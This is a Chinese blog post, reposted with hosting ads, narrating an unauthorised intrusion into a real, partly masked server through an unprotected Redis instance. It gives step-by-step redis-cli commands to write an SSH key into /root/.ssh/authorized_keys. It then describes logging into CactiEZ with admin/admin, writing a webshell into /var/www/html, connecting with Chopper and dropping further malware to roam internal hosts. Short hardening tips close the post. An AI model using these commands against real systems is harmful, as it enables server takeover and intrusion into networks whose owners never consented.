利用未授权的redis写webshell-创新互联

最近redis的话题比较多,因此就有了下面这个故事。

网站制作、网站设计的开发,更需要了解用户,从用户角度来建设网站,获得较好的用户体验。创新互联建站多年互联网经验,见的多,沟通容易、能帮助客户提出的运营建议。作为成都一家网络公司,打造的就是网站建设产品直销的概念。选择创新互联建站,不只是建站,我们把建站作为产品,不断的更新、完善,让每位来访用户感受到浩方产品的价值服务。

目标IP:210.73.90.xxx

利用漏洞:未授权的redis访问

漏洞利用1:

1)本地生成秘钥

root@GanDolf:~# ssh-keygen  -t rsa

利用未授权的redis写webshell

2)将公钥写入一个文件

root@GanDolf:~# cd /root/.ssh/

root@GanDolf:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

3)连接redis写入文件root@GanDolf:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit

OK
root@GanDolf:~/.ssh# redis-cli  -h 210.73.90.xxx

210.73.90.xxx:6379> config set dir /root/.ssh/
OK
(1.39s)
210.73.90.xxx:6379> CONFIG GET dir
1) "dir"
2) "/root/.ssh"
210.73.90.xxx:6379> config set dbfilename "authorized_keys"
OK
(1.03s)
210.73.90.xxx:6379> SAVE
saOK
(1.40s)
210.73.90.xxx:6379> SAVE
OK
210.73.90.xxx:6379> exit
root@GanDolf:~/.ssh# ssh

4)连接服务器

root@GanDolf:~/.ssh# ssh -i id_rsa root@210.73.90.xxx

发现为开启22端口

到此此方法失败

漏洞利用2:

nmap扫描结果:

80 443 开放

访问80原来是CactiEZ v10版本
尝试弱口令登录admin admin登录成功,发现无长传路径。

利用未授权的redis写webshell

尝试redis写webshell

前提:网站的物理路径

手动几次没爆成功

转向挖CactiEZ v10 的一些安装信息
于是乎,下载CactiEZ v10 自己搭建虚拟安装,启动找出物理路径为:

/var/www/html

于是利用redis写shell

利用未授权的redis写webshell

于是菜刀连起:

利用未授权的redis写webshell

最后丢个小码。看看能不能挖到啥东西,后续可以反弹到本地,内容漫游下(好多交换机,主机^__^)

利用未授权的redis写webshell

利用未授权的redis写webshell

最后总结关于redis的安全建议:

1)修改默认端口
2)监听本地端口
3)使用非root启动,否则出现漏洞1,直接拿到root权限
4)修改配置文件,禁用相关命令

# rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52

另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


新闻标题:利用未授权的redis写webshell-创新互联
文章URL:http://scyanting.com/article/ieige.html